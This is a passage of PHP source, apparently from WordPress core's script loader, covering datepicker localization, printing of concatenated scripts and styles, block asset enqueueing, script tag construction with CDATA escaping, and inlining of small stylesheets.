* @since 4.6.0
*
* @link https://api.jqueryui.com/datepicker/#options
*
* @global WP_Locale $wp_locale WordPress date and time locale object.
*/
function wp_localize_jquery_ui_datepicker() {
global $wp_locale;
if ( ! wp_script_is( 'jquery-ui-datepicker', 'enqueued' ) ) {
return;
}
// Convert the PHP date format into jQuery UI's format.
$datepicker_date_format = str_replace(
array(
'd',
'j',
'l',
'z', // Day.
'F',
'M',
'n',
'm', // Month.
'Y',
'y', // Year.
),
array(
'dd',
'd',
'DD',
'o',
'MM',
'M',
'm',
'mm',
'yy',
'y',
),
get_option( 'date_format' )
);
$datepicker_defaults = wp_json_encode(
array(
'closeText' => __( 'Close' ),
'currentText' => __( 'Today' ),
'monthNames' => array_values( $wp_locale->month ),
'monthNamesShort' => array_values( $wp_locale->month_abbrev ),
'nextText' => __( 'Next' ),
'prevText' => __( 'Previous' ),
'dayNames' => array_values( $wp_locale->weekday ),
'dayNamesShort' => array_values( $wp_locale->weekday_abbrev ),
'dayNamesMin' => array_values( $wp_locale->weekday_initial ),
'dateFormat' => $datepicker_date_format,
'firstDay' => absint( get_option( 'start_of_week' ) ),
'isRTL' => $wp_locale->is_rtl(),
),
JSON_HEX_TAG | JSON_UNESCAPED_SLASHES
);
wp_add_inline_script( 'jquery-ui-datepicker', "jQuery(function(jQuery){jQuery.datepicker.setDefaults({$datepicker_defaults});});" );
}
/**
* Localizes community events data that needs to be passed to dashboard.js.
*
* @since 4.8.0
*/
function wp_localize_community_events() {
if ( ! wp_script_is( 'dashboard' ) ) {
return;
}
require_once ABSPATH . 'wp-admin/includes/class-wp-community-events.php';
$user_id = get_current_user_id();
$saved_location = get_user_option( 'community-events-location', $user_id );
$saved_ip_address = isset( $saved_location['ip'] ) ? $saved_location['ip'] : false;
$current_ip_address = WP_Community_Events::get_unsafe_client_ip();
/*
* If the user's location is based on their IP address, then update their
* location when their IP address changes. This allows them to see events
* in their current city when travelling. Otherwise, they would always be
* shown events in the city where they were when they first loaded the
* Dashboard, which could have been months or years ago.
*/
if ( $saved_ip_address && $current_ip_address && $current_ip_address !== $saved_ip_address ) {
$saved_location['ip'] = $current_ip_address;
update_user_meta( $user_id, 'community-events-location', $saved_location );
}
$events_client = new WP_Community_Events( $user_id, $saved_location );
wp_localize_script(
'dashboard',
'communityEventsData',
array(
'nonce' => wp_create_nonce( 'community_events' ),
'cache' => $events_client->get_cached_events(),
'time_format' => get_option( 'time_format' ),
)
);
}
/**
* Administration Screen CSS for changing the styles.
*
* If installing the 'wp-admin/' directory will be replaced with './'.
*
* The $_wp_admin_css_colors global manages the Administration Screens CSS
* stylesheet that is loaded. The option that is set is 'admin_color' and is the
* color and key for the array. The value for the color key is an object with
* a 'url' parameter that has the URL path to the CSS file.
*
* The query from $src parameter will be appended to the URL that is given from
* the $_wp_admin_css_colors array value URL.
*
* @since 2.6.0
*
* @global array $_wp_admin_css_colors
*
* @param string $src Source URL.
* @param string $handle Either 'colors' or 'colors-rtl'.
* @return string|false URL path to CSS stylesheet for Administration Screens.
*/
function wp_style_loader_src( $src, $handle ) {
global $_wp_admin_css_colors;
if ( wp_installing() ) {
return preg_replace( '#^wp-admin/#', './', $src );
}
if ( 'colors' === $handle ) {
$color = get_user_option( 'admin_color' );
if ( empty( $color ) || ! isset( $_wp_admin_css_colors[ $color ] ) ) {
$color = 'fresh';
}
$color = $_wp_admin_css_colors[ $color ];
$url = $color->url;
if ( ! $url ) {
return false;
}
$parsed = parse_url( $src );
if ( isset( $parsed['query'] ) && $parsed['query'] ) {
wp_parse_str( $parsed['query'], $qv );
$url = add_query_arg( $qv, $url );
}
return $url;
}
return $src;
}
/**
* Prints the script queue in the HTML head on admin pages.
*
* Postpones the scripts that were queued for the footer.
* print_footer_scripts() is called in the footer to print these scripts.
*
* @since 2.8.0
*
* @see wp_print_scripts()
*
* @global bool $concatenate_scripts
*
* @return string[] Handles of the scripts that were printed.
*/
function print_head_scripts() {
global $concatenate_scripts;
if ( ! did_action( 'wp_print_scripts' ) ) {
/** This action is documented in wp-includes/functions.wp-scripts.php */
do_action( 'wp_print_scripts' );
}
$wp_scripts = wp_scripts();
script_concat_settings();
$wp_scripts->do_concat = $concatenate_scripts;
$wp_scripts->do_head_items();
/**
* Filters whether to print the head scripts.
*
* @since 2.8.0
*
* @param bool $print Whether to print the head scripts. Default true.
*/
if ( apply_filters( 'print_head_scripts', true ) ) {
_print_scripts();
}
$wp_scripts->reset();
return $wp_scripts->done;
}
/**
* Prints the scripts that were queued for the footer or too late for the HTML head.
*
* @since 2.8.0
*
* @global WP_Scripts $wp_scripts
* @global bool $concatenate_scripts
*
* @return string[] Handles of the scripts that were printed.
*/
function print_footer_scripts() {
global $wp_scripts, $concatenate_scripts;
if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
return array(); // No need to run if not instantiated.
}
script_concat_settings();
$wp_scripts->do_concat = $concatenate_scripts;
$wp_scripts->do_footer_items();
/**
* Filters whether to print the footer scripts.
*
* @since 2.8.0
*
* @param bool $print Whether to print the footer scripts. Default true.
*/
if ( apply_filters( 'print_footer_scripts', true ) ) {
_print_scripts();
}
$wp_scripts->reset();
return $wp_scripts->done;
}
/**
* Prints scripts (internal use only)
*
* @since 2.8.0
*
* @ignore
*
* @global WP_Scripts $wp_scripts
* @global bool $compress_scripts
*/
function _print_scripts() {
global $wp_scripts, $compress_scripts;
$zip = $compress_scripts ? 1 : 0;
if ( $zip && defined( 'ENFORCE_GZIP' ) && ENFORCE_GZIP ) {
$zip = 'gzip';
}
$concat = trim( $wp_scripts->concat, ', ' );
$type_attr = current_theme_supports( 'html5', 'script' ) ? '' : " type='text/javascript'";
if ( $concat ) {
if ( ! empty( $wp_scripts->print_code ) ) {
echo "\n<script{$type_attr}>\n";
echo "/* <![CDATA[ */\n"; // Not needed in HTML 5.
echo $wp_scripts->print_code;
echo sprintf( "\n//# sourceURL=%s\n", rawurlencode( 'js-inline-concat-' . $concat ) );
echo "/* ]]> */\n";
echo "</script>\n";
}
$concat = str_split( $concat, 128 );
$concatenated = '';
foreach ( $concat as $key => $chunk ) {
$concatenated .= "&load%5Bchunk_{$key}%5D={$chunk}";
}
$src = $wp_scripts->base_url . "/wp-admin/load-scripts.php?c={$zip}" . $concatenated . '&ver=' . $wp_scripts->default_version;
echo "<script{$type_attr} src='" . esc_attr( $src ) . "'></script>\n";
}
if ( ! empty( $wp_scripts->print_html ) ) {
echo $wp_scripts->print_html;
}
}
/**
* Prints the script queue in the HTML head on the front end.
*
* Postpones the scripts that were queued for the footer.
* wp_print_footer_scripts() is called in the footer to print these scripts.
*
* @since 2.8.0
*
* @global WP_Scripts $wp_scripts
*
* @return string[] Handles of the scripts that were printed.
*/
function wp_print_head_scripts() {
global $wp_scripts;
if ( ! did_action( 'wp_print_scripts' ) ) {
/** This action is documented in wp-includes/functions.wp-scripts.php */
do_action( 'wp_print_scripts' );
}
if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
return array(); // No need to run if nothing is queued.
}
return print_head_scripts();
}
/**
* Private, for use in *_footer_scripts hooks
*
* In classic themes, when block styles are loaded on demand via wp_load_classic_theme_block_styles_on_demand(),
* this function is replaced by a closure in wp_hoist_late_printed_styles() which will capture the printing of
* two sets of "late" styles to be hoisted to the HEAD by means of the template enhancement output buffer:
*
* 1. Styles related to blocks are inserted right after the wp-block-library stylesheet.
* 2. All other styles are appended to the end of the HEAD.
*
* The closure calls print_footer_scripts() to print scripts in the footer as usual.
*
* @since 3.3.0
*/
function _wp_footer_scripts() {
print_late_styles();
print_footer_scripts();
}
/**
* Hooks to print the scripts and styles in the footer.
*
* @since 2.8.0
*/
function wp_print_footer_scripts() {
/**
* Fires when footer scripts are printed.
*
* @since 2.8.0
*/
do_action( 'wp_print_footer_scripts' );
}
/**
* Wrapper for do_action( 'wp_enqueue_scripts' ).
*
* Allows plugins to queue scripts for the front end using wp_enqueue_script().
* Runs first in wp_head() where all is_home(), is_page(), etc. functions are available.
*
* @since 2.8.0
*/
function wp_enqueue_scripts() {
/**
* Fires when scripts and styles are enqueued.
*
* @since 2.8.0
*/
do_action( 'wp_enqueue_scripts' );
}
/**
* Prints the styles queue in the HTML head on admin pages.
*
* @since 2.8.0
*
* @global bool $concatenate_scripts
*
* @return string[] Handles of the styles that were printed.
*/
function print_admin_styles() {
global $concatenate_scripts;
$wp_styles = wp_styles();
script_concat_settings();
$wp_styles->do_concat = $concatenate_scripts;
$wp_styles->do_items( false );
/**
* Filters whether to print the admin styles.
*
* @since 2.8.0
*
* @param bool $print Whether to print the admin styles. Default true.
*/
if ( apply_filters( 'print_admin_styles', true ) ) {
_print_styles();
}
$wp_styles->reset();
return $wp_styles->done;
}
/**
* Prints the styles that were queued too late for the HTML head.
*
* @since 3.3.0
*
* @global WP_Styles $wp_styles
* @global bool $concatenate_scripts
*
* @return array|void
*/
function print_late_styles() {
global $wp_styles, $concatenate_scripts;
if ( ! ( $wp_styles instanceof WP_Styles ) ) {
return;
}
script_concat_settings();
$wp_styles->do_concat = $concatenate_scripts;
$wp_styles->do_footer_items();
/**
* Filters whether to print the styles queued too late for the HTML head.
*
* @since 3.3.0
*
* @param bool $print Whether to print the 'late' styles. Default true.
*/
if ( apply_filters( 'print_late_styles', true ) ) {
_print_styles();
}
$wp_styles->reset();
return $wp_styles->done;
}
/**
* Prints styles (internal use only).
*
* @ignore
* @since 3.3.0
*
* @global bool $compress_css
*/
function _print_styles() {
global $compress_css;
$wp_styles = wp_styles();
$zip = $compress_css ? 1 : 0;
if ( $zip && defined( 'ENFORCE_GZIP' ) && ENFORCE_GZIP ) {
$zip = 'gzip';
}
$concat = trim( $wp_styles->concat, ', ' );
$type_attr = current_theme_supports( 'html5', 'style' ) ? '' : ' type="text/css"';
if ( $concat ) {
$dir = $wp_styles->text_direction;
$ver = $wp_styles->default_version;
$concat_source_url = 'css-inline-concat-' . $concat;
$concat = str_split( $concat, 128 );
$concatenated = '';
foreach ( $concat as $key => $chunk ) {
$concatenated .= "&load%5Bchunk_{$key}%5D={$chunk}";
}
$href = $wp_styles->base_url . "/wp-admin/load-styles.php?c={$zip}&dir={$dir}" . $concatenated . '&ver=' . $ver;
echo "<link rel='stylesheet' href='" . esc_attr( $href ) . "'{$type_attr} media='all' />\n";
if ( ! empty( $wp_styles->print_code ) ) {
echo "<style{$type_attr}>\n";
echo $wp_styles->print_code;
echo sprintf( "\n/*# sourceURL=%s */", rawurlencode( $concat_source_url ) );
echo "\n</style>\n";
}
}
if ( ! empty( $wp_styles->print_html ) ) {
echo $wp_styles->print_html;
}
}
/**
* Determines the concatenation and compression settings for scripts and styles.
*
* @since 2.8.0
*
* @global bool $concatenate_scripts
* @global bool $compress_scripts
* @global bool $compress_css
*/
function script_concat_settings() {
global $concatenate_scripts, $compress_scripts, $compress_css;
$compressed_output = ( ini_get( 'zlib.output_compression' ) || 'ob_gzhandler' === ini_get( 'output_handler' ) );
$can_compress_scripts = ! wp_installing() && get_site_option( 'can_compress_scripts' );
if ( ! isset( $concatenate_scripts ) ) {
$concatenate_scripts = defined( 'CONCATENATE_SCRIPTS' ) ? CONCATENATE_SCRIPTS : true;
if ( ( ! is_admin() && ! did_action( 'login_init' ) ) || ( defined( 'SCRIPT_DEBUG' ) && SCRIPT_DEBUG ) ) {
$concatenate_scripts = false;
}
}
if ( ! isset( $compress_scripts ) ) {
$compress_scripts = defined( 'COMPRESS_SCRIPTS' ) ? COMPRESS_SCRIPTS : true;
if ( $compress_scripts && ( ! $can_compress_scripts || $compressed_output ) ) {
$compress_scripts = false;
}
}
if ( ! isset( $compress_css ) ) {
$compress_css = defined( 'COMPRESS_CSS' ) ? COMPRESS_CSS : true;
if ( $compress_css && ( ! $can_compress_scripts || $compressed_output ) ) {
$compress_css = false;
}
}
}
/**
* Handles the enqueueing of block scripts and styles that are common to both
* the editor and the front-end.
*
* @since 5.0.0
*/
function wp_common_block_scripts_and_styles() {
if ( is_admin() && ! wp_should_load_block_editor_scripts_and_styles() ) {
return;
}
wp_enqueue_style( 'wp-block-library' );
if ( current_theme_supports( 'wp-block-styles' ) && ! wp_should_load_separate_core_block_assets() ) {
wp_enqueue_style( 'wp-block-library-theme' );
}
/**
* Fires after enqueuing block assets for both editor and front-end.
*
* Call `add_action` on any hook before 'wp_enqueue_scripts'.
*
* In the function call you supply, simply use `wp_enqueue_script` and
* `wp_enqueue_style` to add your functionality to the Gutenberg editor.
*
* @since 5.0.0
*/
do_action( 'enqueue_block_assets' );
}
/**
* Applies a filter to the list of style nodes that comes from WP_Theme_JSON::get_style_nodes().
*
* This particular filter removes all of the blocks from the array.
*
* We want WP_Theme_JSON to be ignorant of the implementation details of how the CSS is being used.
* This filter allows us to modify the output of WP_Theme_JSON depending on whether or not we are
* loading separate assets, without making the class aware of that detail.
*
* @since 6.1.0
*
* @param array $nodes The nodes to filter.
* @return array A filtered array of style nodes.
*/
function wp_filter_out_block_nodes( $nodes ) {
return array_filter(
$nodes,
static function ( $node ) {
return ! in_array( 'blocks', $node['path'], true );
},
ARRAY_FILTER_USE_BOTH
);
}
/**
* Enqueues the global styles defined via theme.json.
*
* @since 5.8.0
*/
function wp_enqueue_global_styles() {
$assets_on_demand = wp_should_load_block_assets_on_demand();
$is_block_theme = wp_is_block_theme();
$is_classic_theme = ! $is_block_theme;
/*
* Global styles should be printed in the head for block themes, or for classic themes when loading assets on
* demand is disabled, which is the default.
* The footer should only be used for classic themes when loading assets on demand is enabled.
*
* See https://core.trac.wordpress.org/ticket/53494 and https://core.trac.wordpress.org/ticket/61965.
*/
if (
( $is_block_theme && doing_action( 'wp_footer' ) ) ||
( $is_classic_theme && doing_action( 'wp_footer' ) && ! $assets_on_demand ) ||
( $is_classic_theme && doing_action( 'wp_enqueue_scripts' ) && $assets_on_demand )
) {
return;
}
/*
* If loading the CSS for each block separately, then load the theme.json CSS conditionally.
* This removes the CSS from the global-styles stylesheet and adds it to the inline CSS for each block.
* This filter must be registered before calling wp_get_global_stylesheet();
*/
add_filter( 'wp_theme_json_get_style_nodes', 'wp_filter_out_block_nodes' );
$stylesheet = wp_get_global_stylesheet();
if ( $is_block_theme ) {
/*
* Dequeue the Customizer's custom CSS
* and add it before the global styles custom CSS.
*/
remove_action( 'wp_head', 'wp_custom_css_cb', 101 );
/*
* Get the custom CSS from the Customizer and add it to the global stylesheet.
* Always do this in Customizer preview for the sake of live preview since it be empty.
*/
$custom_css = trim( wp_get_custom_css() );
if ( $custom_css || is_customize_preview() ) {
if ( is_customize_preview() ) {
/*
* When in the Customizer preview, wrap the Custom CSS in milestone comments to allow customize-preview.js
* to locate the CSS to replace for live previewing. Make sure that the milestone comments are omitted from
* the stored Custom CSS if by chance someone tried to add them, which would be highly unlikely, but it
* would break live previewing.
*/
$before_milestone = '/*BEGIN_CUSTOMIZER_CUSTOM_CSS*/';
$after_milestone = '/*END_CUSTOMIZER_CUSTOM_CSS*/';
$custom_css = str_replace( array( $before_milestone, $after_milestone ), '', $custom_css );
$custom_css = $before_milestone . "\n" . $custom_css . "\n" . $after_milestone;
}
$custom_css = "\n" . $custom_css;
}
$stylesheet .= $custom_css;
// Add the global styles custom CSS at the end.
$stylesheet .= wp_get_global_stylesheet( array( 'custom-css' ) );
}
if ( empty( $stylesheet ) ) {
return;
}
wp_register_style( 'global-styles', false );
wp_add_inline_style( 'global-styles', $stylesheet );
wp_enqueue_style( 'global-styles' );
// Add each block as an inline css.
wp_add_global_styles_for_blocks();
}
/**
* Checks if the editor scripts and styles for all registered block types
* should be enqueued on the current screen.
*
* @since 5.6.0
*
* @global WP_Screen $current_screen WordPress current screen object.
*
* @return bool Whether scripts and styles should be enqueued.
*/
function wp_should_load_block_editor_scripts_and_styles() {
global $current_screen;
$is_block_editor_screen = ( $current_screen instanceof WP_Screen ) && $current_screen->is_block_editor();
/**
* Filters the flag that decides whether or not block editor scripts and styles
* are going to be enqueued on the current screen.
*
* @since 5.6.0
*
* @param bool $is_block_editor_screen Current value of the flag.
*/
return apply_filters( 'should_load_block_editor_scripts_and_styles', $is_block_editor_screen );
}
/**
* Checks whether separate styles should be loaded for core blocks.
*
* When this function returns true, other functions ensure that core blocks use their own separate stylesheets.
* When this function returns false, all core blocks will use the single combined 'wp-block-library' stylesheet.
*
* As a side effect, the return value will by default result in block assets to be loaded on demand, via the
* {@see wp_should_load_block_assets_on_demand()} function. This behavior can be separately altered via that function.
*
* This only affects front end and not the block editor screens.
*
* @since 5.8.0
* @see @see wp_should_load_block_assets_on_demand()
* @see wp_enqueue_registered_block_scripts_and_styles()
* @see register_block_style_handle()
*
* @return bool Whether separate core block assets will be loaded.
*/
function wp_should_load_separate_core_block_assets() {
if ( is_admin() || is_feed() || wp_is_rest_endpoint() ) {
return false;
}
/**
* Filters whether block styles should be loaded separately.
*
* Returning false loads all core block assets, regardless of whether they are rendered
* in a page or not. Returning true loads core block assets only when they are rendered.
*
* @since 5.8.0
*
* @param bool $load_separate_assets Whether separate assets will be loaded.
* Default false (all block assets are loaded, even when not used).
*/
return apply_filters( 'should_load_separate_core_block_assets', false );
}
/**
* Checks whether block styles should be loaded only on-render.
*
* When this function returns true, other functions ensure that blocks only load their assets on-render.
* When this function returns false, all block assets are loaded regardless of whether they are rendered in a page.
*
* The default return value depends on the result of {@see wp_should_load_separate_core_block_assets()}, which controls
* whether Core block stylesheets should be loaded separately or via a combined 'wp-block-library' stylesheet.
*
* This only affects front end and not the block editor screens.
*
* @since 6.8.0
* @see wp_should_load_separate_core_block_assets()
*
* @return bool Whether to load block assets only when they are rendered.
*/
function wp_should_load_block_assets_on_demand() {
if ( is_admin() || is_feed() || wp_is_rest_endpoint() ) {
return false;
}
/*
* For backward compatibility, the default return value for this function is based on the return value of
* `wp_should_load_separate_core_block_assets()`. Initially, this function used to control both of these concerns.
*/
$load_assets_on_demand = wp_should_load_separate_core_block_assets();
/**
* Filters whether block styles should be loaded on demand.
*
* Returning false loads all block assets, regardless of whether they are rendered in a page or not.
* Returning true loads block assets only when they are rendered.
*
* The default value of the filter depends on the result of {@see wp_should_load_separate_core_block_assets()},
* which controls whether Core block stylesheets should be loaded separately or via a combined 'wp-block-library'
* stylesheet.
*
* @since 6.8.0
*
* @param bool $load_assets_on_demand Whether to load block assets only when they are rendered.
*/
return apply_filters( 'should_load_block_assets_on_demand', $load_assets_on_demand );
}
/**
* Enqueues registered block scripts and styles, depending on current rendered
* context (only enqueuing editor scripts while in context of the editor).
*
* @since 5.0.0
*/
function wp_enqueue_registered_block_scripts_and_styles() {
if ( wp_should_load_block_assets_on_demand() ) {
return;
}
$load_editor_scripts_and_styles = is_admin() && wp_should_load_block_editor_scripts_and_styles();
$block_registry = WP_Block_Type_Registry::get_instance();
/*
* Block styles are only enqueued if they're registered. For core blocks, this is only the case if
* `wp_should_load_separate_core_block_assets()` returns true. Otherwise they use the single combined
* 'wp-block-library` stylesheet. See also `register_core_block_style_handles()`.
* Since `wp_enqueue_style()` does not trigger warnings if the style is not registered, it is okay to not cater for
* this behavior here and simply call `wp_enqueue_style()` unconditionally.
*/
foreach ( $block_registry->get_all_registered() as $block_name => $block_type ) {
// Front-end and editor styles.
foreach ( $block_type->style_handles as $style_handle ) {
wp_enqueue_style( $style_handle );
}
// Front-end and editor scripts.
foreach ( $block_type->script_handles as $script_handle ) {
wp_enqueue_script( $script_handle );
}
if ( $load_editor_scripts_and_styles ) {
// Editor styles.
foreach ( $block_type->editor_style_handles as $editor_style_handle ) {
wp_enqueue_style( $editor_style_handle );
}
// Editor scripts.
foreach ( $block_type->editor_script_handles as $editor_script_handle ) {
wp_enqueue_script( $editor_script_handle );
}
}
}
}
/**
* Function responsible for enqueuing the styles required for block styles functionality on the editor and on the frontend.
*
* @since 5.3.0
*
* @global WP_Styles $wp_styles
*/
function enqueue_block_styles_assets() {
global $wp_styles;
$block_styles = WP_Block_Styles_Registry::get_instance()->get_all_registered();
foreach ( $block_styles as $block_name => $styles ) {
foreach ( $styles as $style_properties ) {
if ( isset( $style_properties['style_handle'] ) ) {
// If the site loads block styles on demand, enqueue the stylesheet on render.
if ( wp_should_load_block_assets_on_demand() ) {
add_filter(
'render_block',
static function ( $html, $block ) use ( $block_name, $style_properties ) {
if ( $block['blockName'] === $block_name ) {
wp_enqueue_style( $style_properties['style_handle'] );
}
return $html;
},
10,
2
);
} else {
wp_enqueue_style( $style_properties['style_handle'] );
}
}
if ( isset( $style_properties['inline_style'] ) ) {
// Default to "wp-block-library".
$handle = 'wp-block-library';
// If the site loads block styles on demand, check if the block has a stylesheet registered.
if ( wp_should_load_block_assets_on_demand() ) {
$block_stylesheet_handle = generate_block_asset_handle( $block_name, 'style' );
if ( isset( $wp_styles->registered[ $block_stylesheet_handle ] ) ) {
$handle = $block_stylesheet_handle;
}
}
// Add inline styles to the calculated handle.
wp_add_inline_style( $handle, $style_properties['inline_style'] );
}
}
}
}
/**
* Function responsible for enqueuing the assets required for block styles functionality on the editor.
*
* @since 5.3.0
*/
function enqueue_editor_block_styles_assets() {
$block_styles = WP_Block_Styles_Registry::get_instance()->get_all_registered();
$register_script_lines = array( '( function() {' );
foreach ( $block_styles as $block_name => $styles ) {
foreach ( $styles as $style_properties ) {
$block_style = array(
'name' => $style_properties['name'],
'label' => $style_properties['label'],
);
if ( isset( $style_properties['is_default'] ) ) {
$block_style['isDefault'] = $style_properties['is_default'];
}
$register_script_lines[] = sprintf(
' wp.blocks.registerBlockStyle( \'%s\', %s );',
$block_name,
wp_json_encode( $block_style, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
);
}
}
$register_script_lines[] = '} )();';
$inline_script = implode( "\n", $register_script_lines );
wp_register_script( 'wp-block-styles', false, array( 'wp-blocks' ), true, array( 'in_footer' => true ) );
wp_add_inline_script( 'wp-block-styles', $inline_script );
wp_enqueue_script( 'wp-block-styles' );
}
/**
* Enqueues the assets required for the block directory within the block editor.
*
* @since 5.5.0
*/
function wp_enqueue_editor_block_directory_assets() {
wp_enqueue_script( 'wp-block-directory' );
wp_enqueue_style( 'wp-block-directory' );
}
/**
* Enqueues the assets required for the format library within the block editor.
*
* @since 5.8.0
*/
function wp_enqueue_editor_format_library_assets() {
wp_enqueue_script( 'wp-format-library' );
wp_enqueue_style( 'wp-format-library' );
}
/**
* Sanitizes an attributes array into an attributes string to be placed inside a `<script>` tag.
*
* Automatically injects type attribute if needed.
* Used by {@see wp_get_script_tag()} and {@see wp_get_inline_script_tag()}.
*
* @since 5.7.0
*
* @param array $attributes Key-value pairs representing `<script>` tag attributes.
* @return string String made of sanitized `<script>` tag attributes.
*/
function wp_sanitize_script_attributes( $attributes ) {
$html5_script_support = is_admin() || current_theme_supports( 'html5', 'script' );
$attributes_string = '';
/*
* If HTML5 script tag is supported, only the attribute name is added
* to $attributes_string for entries with a boolean value, and that are true.
*/
foreach ( $attributes as $attribute_name => $attribute_value ) {
if ( is_bool( $attribute_value ) ) {
if ( $attribute_value ) {
$attributes_string .= $html5_script_support ? ' ' . esc_attr( $attribute_name ) : sprintf( ' %1$s="%2$s"', esc_attr( $attribute_name ), esc_attr( $attribute_name ) );
}
} else {
$attributes_string .= sprintf( ' %1$s="%2$s"', esc_attr( $attribute_name ), esc_attr( $attribute_value ) );
}
}
return $attributes_string;
}
/**
* Formats `<script>` loader tags.
*
* It is possible to inject attributes in the `<script>` tag via the {@see 'wp_script_attributes'} filter.
* Automatically injects type attribute if needed.
*
* @since 5.7.0
*
* @param array $attributes Key-value pairs representing `<script>` tag attributes.
* @return string String containing `<script>` opening and closing tags.
*/
function wp_get_script_tag( $attributes ) {
if ( ! isset( $attributes['type'] ) && ! is_admin() && ! current_theme_supports( 'html5', 'script' ) ) {
// Keep the type attribute as the first for legacy reasons (it has always been this way in core).
$attributes = array_merge(
array( 'type' => 'text/javascript' ),
$attributes
);
}
/**
* Filters attributes to be added to a script tag.
*
* @since 5.7.0
*
* @param array $attributes Key-value pairs representing `<script>` tag attributes.
* Only the attribute name is added to the `<script>` tag for
* entries with a boolean value, and that are true.
*/
$attributes = apply_filters( 'wp_script_attributes', $attributes );
return sprintf( "<script%s></script>\n", wp_sanitize_script_attributes( $attributes ) );
}
/**
* Prints formatted `<script>` loader tag.
*
* It is possible to inject attributes in the `<script>` tag via the {@see 'wp_script_attributes'} filter.
* Automatically injects type attribute if needed.
*
* @since 5.7.0
*
* @param array $attributes Key-value pairs representing `<script>` tag attributes.
*/
function wp_print_script_tag( $attributes ) {
echo wp_get_script_tag( $attributes );
}
/**
* Constructs an inline script tag.
*
* It is possible to inject attributes in the `<script>` tag via the {@see 'wp_inline_script_attributes'} filter.
* Automatically injects type attribute if needed.
*
* @since 5.7.0
*
* @param string $data Data for script tag: JavaScript, importmap, speculationrules, etc.
* @param array $attributes Optional. Key-value pairs representing `<script>` tag attributes.
* @return string String containing inline JavaScript code wrapped around `<script>` tag.
*/
function wp_get_inline_script_tag( $data, $attributes = array() ) {
$is_html5 = current_theme_supports( 'html5', 'script' ) || is_admin();
if ( ! isset( $attributes['type'] ) && ! $is_html5 ) {
// Keep the type attribute as the first for legacy reasons (it has always been this way in core).
$attributes = array_merge(
array( 'type' => 'text/javascript' ),
$attributes
);
}
/*
* XHTML extracts the contents of the SCRIPT element and then the XML parser
* decodes character references and other syntax elements. This can lead to
* misinterpretation of the script contents or invalid XHTML documents.
*
* Wrapping the contents in a CDATA section instructs the XML parser not to
* transform the contents of the SCRIPT element before passing them to the
* JavaScript engine.
*
* Example:
*
* <script>console.log('…');</script>
*
* In an HTML document this would print "…" to the console,
* but in an XHTML document it would print "…" to the console.
*
* <script>console.log('An image is <img> in HTML');</script>
*
* In an HTML document this would print "An image is <img> in HTML",
* but it's an invalid XHTML document because it interprets the `<img>`
* as an empty tag missing its closing `/`.
*
* @see https://www.w3.org/TR/xhtml1/#h-4.8
*/
if (
! $is_html5 &&
(
! isset( $attributes['type'] ) ||
'module' === $attributes['type'] ||
str_contains( $attributes['type'], 'javascript' ) ||
str_contains( $attributes['type'], 'ecmascript' ) ||
str_contains( $attributes['type'], 'jscript' ) ||
str_contains( $attributes['type'], 'livescript' )
)
) {
/*
* If the string `]]>` exists within the JavaScript it would break
* out of any wrapping CDATA section added here, so to start, it's
* necessary to escape that sequence which requires splitting the
* content into two CDATA sections wherever it's found.
*
* Note: it's only necessary to escape the closing `]]>` because
* an additional `<![CDATA[` leaves the contents unchanged.
*/
$data = str_replace( ']]>', ']]]]><![CDATA[>', $data );
// Wrap the entire escaped script inside a CDATA section.
$data = sprintf( "/* <![CDATA[ */\n%s\n/* ]]> */", $data );
}
$data = "\n" . trim( $data, "\n\r " ) . "\n";
/**
* Filters attributes to be added to a script tag.
*
* @since 5.7.0
*
* @param array $attributes Key-value pairs representing `<script>` tag attributes.
* Only the attribute name is added to the `<script>` tag for
* entries with a boolean value, and that are true.
* @param string $data Inline data.
*/
$attributes = apply_filters( 'wp_inline_script_attributes', $attributes, $data );
return sprintf( "<script%s>%s</script>\n", wp_sanitize_script_attributes( $attributes ), $data );
}
/**
* Prints an inline script tag.
*
* It is possible to inject attributes in the `<script>` tag via the {@see 'wp_inline_script_attributes'} filter.
* Automatically injects type attribute if needed.
*
* @since 5.7.0
*
* @param string $data Data for script tag: JavaScript, importmap, speculationrules, etc.
* @param array $attributes Optional. Key-value pairs representing `<script>` tag attributes.
*/
function wp_print_inline_script_tag( $data, $attributes = array() ) {
echo wp_get_inline_script_tag( $data, $attributes );
}
/**
* Allows small styles to be inlined.
*
* This improves performance and sustainability, and is opt-in. Stylesheets can opt in
* by adding `path` data using `wp_style_add_data`, and defining the file's absolute path:
*
* wp_style_add_data( $style_handle, 'path', $file_path );
*
* @since 5.8.0
*
* @global WP_Styles $wp_styles
*/
function wp_maybe_inline_styles() {
global $wp_styles;
$total_inline_limit = 40000;
/**
* The maximum size of inlined styles in bytes.
*
* @since 5.8.0
* @since 6.9.0 The default limit increased from 20K to 40K.
*
* @param int $total_inline_limit The file-size threshold, in bytes. Default 40000.
*/
$total_inline_limit = apply_filters( 'styles_inline_size_limit', $total_inline_limit );
$styles = array();
// Build an array of styles that have a path defined.
foreach ( $wp_styles->queue as $handle ) {
if ( ! isset( $wp_styles->registered[ $handle ] ) ) {
continue;
}
$src = $wp_styles->registered[ $handle ]->src;
$path = $wp_styles->get_data( $handle, 'path' );
if ( $path && $src ) {
$size = wp_filesize( $path );
if ( ! $size ) {
continue;
}
$styles[] = array(
'handle' => $handle,
'src' => $src,
'path' => $path,
'size' => $size,
);
}
}
if ( ! empty( $styles ) ) {
// Reorder styles array based on size.
usort(
$styles,
static function ( $a, $b ) {
return ( $a['size'] <= $b['size'] ) ? -1 : 1;
}
);
/*
* The total inlined size.
*
* On each iteration of the loop, if a style gets added inline the value of this var increases
* to reflect the total size of inlined styles.
*/
$total_inline_size = 0;
// Loop styles.
foreach ( $styles as $style ) {
// Size check. Since styles are ordered by size, we can break the loop.
if ( $total_inline_size + $style['size'] > $total_inline_limit ) {
break;
}
// Get the styles if we don't already have them.
$style['css'] = file_get_contents( $style['path'] );
/*
* Check if the style contains relative URLs that need to be modified.
* URLs relative to the stylesheet's path should be converted to relative to the site's root.
*/
$style['css'] = _wp_normalize_relative_css_links( $style['css'], $style['src'] );
// Keep track of the original `src` for the style that was inlined so that the `sourceURL` comment can be added.
$wp_styles->add_data( $style['handle'], 'inlined_src', $style['src'] );
// Set `src` to `false` and add styles inline.
$wp_styles->registered[ $style['handle'] ]->src = false;
if ( empty( $wp_styles->registered[ $style['handle'] ]->extra['after'] ) ) {
$wp_styles->registered[ $style['handle'] ]->extra['after'] = array();
}
array_unshift( $wp_styles->registered[ $style['handle'] ]->extra['after'], $style['css'] );
// Add the styles size to the $total_inline_size var.
